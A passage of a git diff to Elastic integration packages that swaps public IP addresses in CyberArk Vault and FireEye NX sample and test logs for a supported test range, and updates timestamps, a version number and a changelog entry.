09:27:14\",\"IsoTimestamp\":\"2021-03-04T17:27:14Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAGWUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -116,7 +116,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684022300Z", + "ingested": "2021-12-09T13:37:15.267396800Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", @@ -186,7 +186,7 @@ "event": { "severity": 2, "action": "retrieve file", - "ingested": "2021-06-09T10:24:37.684023500Z", + "ingested": "2021-12-09T13:37:15.267402800Z", "original": "\u003c5\u003e1 2021-03-04T17:27:21Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:21\",\"IsoTimestamp\":\"2021-03-04T17:27:21Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"51\",\"Desc\":\"Retrieve File\",\"Severity\":\"Info\",\"Issuer\":\"PasswordManager\",\"Action\":\"Retrieve File\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PasswordManagerShared\",\"File\":\"Root\\\\Policies\\\\Policy-GenericWebApp.ini\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Retrieve File\",\"GatewayStation\":\"\"}}}", "code": "51", "kind": "event" @@ -241,7 +241,7 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:37.684024500Z", + "ingested": "2021-12-09T13:37:15.267408600Z", "original": "\u003c5\u003e1 2021-03-04T17:27:33Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 04 09:27:33\",\"IsoTimestamp\":\"2021-03-04T17:27:33Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"7\",\"Desc\":\"Logon\",\"Severity\":\"Info\",\"Issuer\":\"PVWAAppUser\",\"Action\":\"Logon\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"\",\"File\":\"\",\"Station\":\"10.0.1.20\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Logon\",\"GatewayStation\":\"\"}}}", "code": "7", "kind": "event", diff --git a/packages/cyberarkpas/manifest.yml b/packages/cyberarkpas/manifest.yml index f8b61b26e55..77ca5219bda 100644 --- a/packages/cyberarkpas/manifest.yml +++ b/packages/cyberarkpas/manifest.yml @@ -1,6 +1,6 @@ name: cyberarkpas title: CyberArk Privileged Access Security Logs -version: 2.2.0 +version: 2.2.1 release: ga description: Collect audit logs from Cyberark Vault servers with Elastic Agent. type: integration diff --git a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log index 11fbc6883eb..a8930a3c74a 100644 --- a/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log +++ b/packages/fireeye/_dev/deploy/docker/sample_logs/fireeye-nx.log @@ -1,11 +1,11 @@ {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.991339+0000\",\"flow_id\":721570461162990,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":45944,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:12.761326+0000\",\"end\":\"2020-09-22T08:34:12.761348+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":520,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"202.65.114.202\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993227+0000\",\"flow_id\":1285126005631046,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":44535,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:22.763974+0000\",\"end\":\"2020-09-22T08:34:22.764073+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":522,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"213.227.168.146\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"202.28.116.236\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"162.159.246.125\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"67.43.156.15\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"67.43.156.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:19.906154+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"548d03d3e11c009da833e6e59c4adfee\",\"stored\":false,\"size\":6394,\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"8.8.8.8\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:41.077232+0000\",\"flow_id\":206535698492848,\"iface\":\"pether3\",\"event_type\":\"dns\",\"src_ip\":\"192.168.1.176\",\"src_port\":60269,\"dest_ip\":\"67.43.156.15\",\"dest_port\":53,\"proto\":\"UDP\",\"dns\":{\"type\":\"query\",\"id\":28224,\"rrname\":\"time-ios.apple.com\",\"rrtype\":\"A\",\"tx_id\":0}}\n","meta_sip4":"192.168.1.99","meta_oml":289,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:20.318400+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"http\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"tx_id\":1,\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":809}}\n","meta_sip4":"192.168.1.99","meta_oml":598,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:20.672648+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.100.31\",\"src_port\":5601,\"dest_ip\":\"192.168.1.222\",\"dest_port\":47220,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_content_type\":\"application\\/json\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"status\":200,\"length\":809},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"ee8b228580c01ae19804cb965451c4b2\",\"stored\":false,\"size\":2398,\"tx_id\":1}}\n","meta_sip4":"192.168.1.99","meta_oml":824,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:21.289128+0000\",\"flow_id\":1444203537876422,\"iface\":\"pether3\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.1.222\",\"src_port\":47220,\"dest_ip\":\"192.168.100.31\",\"dest_port\":5601,\"proto\":\"TCP\",\"http\":{\"hostname\":\"192.168.100.31\",\"url\":\"\\/internal\\/search\\/es\",\"http_user_agent\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\",\"http_refer\":\"http:\\/\\/192.168.100.31:5601\\/app\\/kibana\",\"http_method\":\"POST\",\"protocol\":\"HTTP\\/1.1\",\"length\":0},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/internal\\/search\\/es\",\"magic\":\"ASCII text, with very long lines, with no line terminators\",\"state\":\"CLOSED\",\"md5\":\"a32585f392aa640e72431abbb961c255\",\"stored\":false,\"size\":6333,\"tx_id\":2}}\n","meta_sip4":"192.168.1.99","meta_oml":769,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} diff --git a/packages/fireeye/changelog.yml b/packages/fireeye/changelog.yml index 6d780041cc0..6be6284a745 100644 --- a/packages/fireeye/changelog.yml +++ b/packages/fireeye/changelog.yml @@ -1,3 +1,8 @@ +- version: "1.1.1" + changes: + - description: Change test public IPs to the supported subset + type: bugfix + link: https://github.com/elastic/integrations/pull/2327 - version: "1.1.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log index 499f039a941..cefaa445d76 100644 --- a/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log +++ b/packages/fireeye/data_stream/nx/_dev/test/pipeline/test-nx.log @@ -1,8 +1,8 @@ {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.991339+0000\",\"flow_id\":721570461162990,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":45944,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:12.761326+0000\",\"end\":\"2020-09-22T08:34:12.761348+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"timeout\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":520,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"202.65.114.202\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993228+0000\",\"flow_id\":175370876476591,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":39808,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:33:15.122031+0000\",\"end\":\"2020-09-22T08:33:15.193693+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":475,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} {"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993227+0000\",\"flow_id\":1285126005631046,\"event_type\":\"flow\",\"src_ip\":\"fe80:0000:0000:0000:feec:daff:fe31:b706\",\"src_port\":44535,\"dest_ip\":\"ff02:0000:0000:0000:0000:0000:0000:0001\",\"dest_port\":10001,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tc\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":8,\"pkts_toclient\":0,\"bytes_toserver\":1680,\"bytes_toclient\":0,\"start\":\"2020-09-22T08:34:22.763974+0000\",\"end\":\"2020-09-22T08:34:22.764073+0000\",\"age\":0,\"state\":\"new\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":522,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"213.227.168.146\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"202.28.116.236\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} -{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"162.159.246.125\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=fireeye.com\",\"issuerdn\":\"C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3\",\"ja3\":{\"hash\":\"21536525fbf9e289f79e0f98af64bb59\",\"string\":\"771,49199-49195-49200-49196-158-159-49191-49187-49192-49188-103-107-49171-49161-49172-49162-51-57-156-157-60-61-47-53-255,0-11-10-13-15-13172,25-24-23,0-1-2\"},\"ja3s\":{\"hash\":\"9873b112313d7c4e5e8ef6207e6c6f0d\",\"string\":\"771,49195,0-65281-11-13172\"},\"fingerprint\":\"2a:6a:46:d2:05:4d:7b:22:1b:68:02:f2:ee:f0:09:c6:ff:15:e9:58\",\"sni\":\"cloud.fireeye.com\",\"version\":\"TLS 1.2\",\"notbefore\":\"2020-07-01T00:00:00.000000+0000\",\"notafter\":\"2021-07-01T12:00:00.000000+0000\",\"client_ciphersuites\":[49199,49195,49200,49196,158,159,49191,49187,49192,49188,103,107,49171,49161,49172,49162,51,57,156,157,60,61,47,53,255],\"client_tls_exts\":[0,11,10,13,15,13172],\"server_ciphersuite\":49195,\"server_tls_exts\":[0,65281,11,13172],\"pubkeylength\":65}}\n","meta_sip4":"192.168.1.99","meta_oml":1146,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993286+0000\",\"flow_id\":222460015300681,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.150\",\"src_port\":51082,\"dest_ip\":\"67.43.156.15\",\"dest_port\":5938,\"proto\":\"TCP\",\"proto_number\":6,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":799,\"pkts_toclient\":544,\"bytes_toserver\":69825,\"bytes_toclient\":59808,\"start\":\"2020-09-22T04:48:48.282697+0000\",\"end\":\"2020-09-22T08:34:36.067255+0000\",\"age\":13548,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false},\"tcp\":{\"tcp_flags\":\"1a\",\"tcp_flags_ts\":\"1a\",\"tcp_flags_tc\":\"1a\",\"syn\":true,\"psh\":true,\"ack\":true,\"state\":\"established\"}}\n","meta_sip4":"192.168.1.99","meta_oml":611,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-22T08:34:44.993501+0000\",\"flow_id\":1463569002949603,\"event_type\":\"flow\",\"src_ip\":\"192.168.1.15\",\"src_port\":52147,\"dest_ip\":\"67.43.156.14\",\"dest_port\":123,\"proto\":\"UDP\",\"proto_number\":17,\"ip_tos\":0,\"app_proto\":\"failed\",\"flow\":{\"pkts_toserver\":1,\"pkts_toclient\":1,\"bytes_toserver\":90,\"bytes_toclient\":90,\"start\":\"2020-09-22T08:32:06.355299+0000\",\"end\":\"2020-09-22T08:32:06.439495+0000\",\"age\":0,\"state\":\"established\",\"reason\":\"shutdown\",\"alerted\":false}}\n","meta_sip4":"192.168.1.99","meta_oml":476,"deviceid":"860665216674","meta_cbname":"fireeye-7e0de1"} +{"rawmsg":"{\"timestamp\":\"2020-09-23T05:02:01.175635+0000\",\"flow_id\":1136872856843530,\"iface\":\"pether3\",\"event_type\":\"tls\",\"src_ip\":\"192.168.1.99\",\"src_port\":53918,\"dest_ip\":\"67.43.156.13\",\"dest_port\":443,\"proto\":\"TCP\",\"tls\":{\"subject\":\"C=US, ST=CA, L=San 